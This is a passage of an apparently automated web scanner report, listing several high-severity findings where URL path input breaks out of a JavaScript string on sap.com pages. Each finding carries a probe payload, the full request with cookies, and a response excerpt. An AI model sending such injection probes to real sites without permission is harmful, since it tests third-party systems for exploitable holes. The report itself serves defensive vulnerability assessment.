Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; nwt=wetnow; ARPT=ONKKMMS169.145.6.59CKMMW; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; mbox=session#1321210845752-117832#1321212825|check#true#1321211025; 37021986-VID=5110247826455; 37021986-SKEY=8052586457831773007; HumanClickSiteContainerID_37021986=STANDALONE; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARA000002,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000003,9|LOB=PTWN000005,9|SEGMENT=SEG0003,9|

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34392
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; domain=.sap.com; expires=Tue, 12-Nov-2013 19:18:06 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:18:06 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:18:06 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='globald960e';df9b76a1320';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.114. http://www.sap.com/global/ui/richmedia/js/projects/rm_UMP/rm_UMP_cc.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/ui/richmedia/js/projects/rm_UMP/rm_UMP_cc.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9aa40'%3b4c4ad194a39 was submitted in the REST URL parameter 1. This input was echoed as 9aa40';4c4ad194a39 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /global9aa40'%3b4c4ad194a39/ui/richmedia/js/projects/rm_UMP/rm_UMP_cc.js HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; nwt=wetnow; ARPT=ONKKMMS169.145.6.59CKMMW; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; mbox=session#1321210845752-117832#1321212825|check#true#1321211025; 37021986-VID=5110247826455; 37021986-SKEY=8052586457831773007; HumanClickSiteContainerID_37021986=STANDALONE; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARA000002,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000003,9|LOB=PTWN000005,9|SEGMENT=SEG0003,9|

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34413
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; domain=.sap.com; expires=Tue, 12-Nov-2013 19:18:01 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:18:01 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:18:01 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='global9aa40';4c4ad194a39';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.115. http://www.sap.com/global/ui/richmedia/js/projects/rm_UMP/rm_UMP_chapter.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/ui/richmedia/js/projects/rm_UMP/rm_UMP_chapter.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 11690'%3bb040f2da0c1 was submitted in the REST URL parameter 1. This input was echoed as 11690';b040f2da0c1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /global11690'%3bb040f2da0c1/ui/richmedia/js/projects/rm_UMP/rm_UMP_chapter.js HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; nwt=wetnow; ARPT=ONKKMMS169.145.6.59CKMMW; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; mbox=session#1321210845752-117832#1321212825|check#true#1321211025; 37021986-VID=5110247826455; 37021986-SKEY=8052586457831773007; HumanClickSiteContainerID_37021986=STANDALONE; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARA000002,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000003,9|LOB=PTWN000005,9|SEGMENT=SEG0003,9|

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34464
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; domain=.sap.com; expires=Tue, 12-Nov-2013 19:18:01 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:18:01 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:18:01 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='global11690';b040f2da0c1';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.116. http://www.sap.com/global/ui/richmedia/js/projects/rm_UMP/rm_UMP_controls.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/ui/richmedia/js/projects/rm_UMP/rm_UMP_controls.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4781'%3b89984ca68ca was submitted in the REST URL parameter 1. This input was echoed as a4781';89984ca68ca in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /globala4781'%3b89984ca68ca/ui/richmedia/js/projects/rm_UMP/rm_UMP_controls.js HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; nwt=wetnow; ARPT=ONKKMMS169.145.6.59CKMMW; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; mbox=session#1321210845752-117832#1321212825|check#true#1321211025; 37021986-VID=5110247826455; 37021986-SKEY=8052586457831773007; HumanClickSiteContainerID_37021986=STANDALONE; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARA000002,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000003,9|LOB=PTWN000005,9|SEGMENT=SEG0003,9|

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34471
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; domain=.sap.com; expires=Tue, 12-Nov-2013 19:18:04 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:18:04 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:18:04 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='globala4781';89984ca68ca';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.117. http://www.sap.com/global/ui/richmedia/js/projects/rm_UMP/rm_UMP_cta.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/ui/richmedia/js/projects/rm_UMP/rm_UMP_cta.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba74a'%3b879ffb992f was submitted in the REST URL parameter 1. This input was echoed as ba74a';879ffb992f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /globalba74a'%3b879ffb992f/ui/richmedia/js/projects/rm_UMP/rm_UMP_cta.js HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; nwt=wetnow; ARPT=ONKKMMS169.145.6.59CKMMW; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; mbox=session#1321210845752-117832#1321212825|check#true#1321211025; 37021986-VID=5110247826455; 37021986-SKEY=8052586457831773007; HumanClickSiteContainerID_37021986=STANDALONE; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARA000002,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000003,9|LOB=PTWN000005,9|SEGMENT=SEG0003,9|

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34413
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; domain=.sap.com; expires=Tue, 12-Nov-2013 19:18:01 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:18:01 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:18:00 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='globalba74a';879ffb992f';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.118. http://www.sap.com/global/ui/richmedia/js/projects/rm_UMP/rm_UMP_rollover.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/ui/richmedia/js/projects/rm_UMP/rm_UMP_rollover.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70a4b'%3b08e671c02b9 was submitted in the REST URL parameter 1. This input was echoed as 70a4b';08e671c02b9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /global70a4b'%3b08e671c02b9/ui/richmedia/js/projects/rm_UMP/rm_UMP_rollover.js HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; nwt=wetnow; ARPT=ONKKMMS169.145.6.59CKMMW; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; mbox=session#1321210845752-117832#1321212825|check#true#1321211025; 37021986-VID=5110247826455; 37021986-SKEY=8052586457831773007; HumanClickSiteContainerID_37021986=STANDALONE; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARA000002,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000003,9|LOB=PTWN000005,9|SEGMENT=SEG0003,9|

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34471
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; domain=.sap.com; expires=Tue, 12-Nov-2013 19:18:00 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:18:00 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:18:00 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='global70a4b';08e671c02b9';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.119. http://www.sap.com/global/ui/richmedia/js/require.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/ui/richmedia/js/require.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 897e8'%3b64a37e8a73 was submitted in the REST URL parameter 1. This input was echoed as 897e8';64a37e8a73 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /global897e8'%3b64a37e8a73/ui/richmedia/js/require.js HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; 37021986-VID=5110247826455; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; nwt=wetnow; ARPT=ONKKMMS169.145.6.59CKMMW; session=52383e4a-d615-4153-a2b4-311fe768b4c7; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34244
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:03:10 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:03:10 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:03:09 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='global897e8';64a37e8a73';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.120. http://www.sap.com/global/ui/richmedia/js/utils/rm_UMP_config.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/ui/richmedia/js/utils/rm_UMP_config.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e3bb'%3b2cab67335f7 was submitted in the REST URL parameter 1. This input was echoed as 1e3bb';2cab67335f7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /global1e3bb'%3b2cab67335f7/ui/richmedia/js/utils/rm_UMP_config.js HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.sap.com/country-selector.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; 37021986-VID=5110247826455; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; nwt=wetnow; ARPT=ONKKMMS169.145.6.59CKMMW; session=52383e4a-d615-4153-a2b4-311fe768b4c7; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CountryRedirectFlag=1; mbox=check#true#1321210906|session#1321210845752-117832#1321212706

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34363
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:03:16 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:03:16 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:03:15 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='global1e3bb';2cab67335f7';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.121. http://www.sap.com/global/ui/richmedia/js/utils/rm_browser.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/ui/richmedia/js/utils/rm_browser.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 37f00'%3b2a454ffd699 was submitted in the REST URL parameter 1. This input was echoed as 37f00';2a454ffd699 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /global37f00'%3b2a454ffd699/ui/richmedia/js/utils/rm_browser.js HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
